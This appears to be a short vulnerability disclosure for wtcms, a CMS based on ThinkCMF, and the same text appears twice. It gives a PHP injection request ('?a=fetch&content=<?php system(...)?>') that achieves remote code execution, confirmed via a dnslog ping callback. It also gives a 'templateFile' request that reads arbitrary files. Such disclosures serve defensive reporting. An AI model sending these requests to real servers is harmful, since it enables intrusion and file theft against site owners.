wtcms is based on thinkcmf,but there is a RCE vulnerability has been exposed about thinkcmf in October(detail:https://www.freebuf.com/vuls/218105.html)。An attacker can execute any command by requesting ?a=fetch&content=<?php system('ping xxxxxx');?>
To demonstrate this vulnerability, we reproduce it via dnslog

after sending request above, we can get some dns query record on dnslog platform

besides, we can read any file by sending a request ?a=display&templateFile=README.md
we can change the value of templateFile to read any file.

wtcms is based on thinkcmf,but there is a RCE vulnerability has been exposed about thinkcmf in October(detail:https://www.freebuf.com/vuls/218105.html)。An attacker can execute any command by requesting
?a=fetch&content=<?php system('ping xxxxxx');?>To demonstrate this vulnerability, we reproduce it via dnslog
after sending request above, we can get some dns query record on dnslog platform

besides, we can read any file by sending a request
?a=display&templateFile=README.mdwe can change the value of
templateFileto read any file.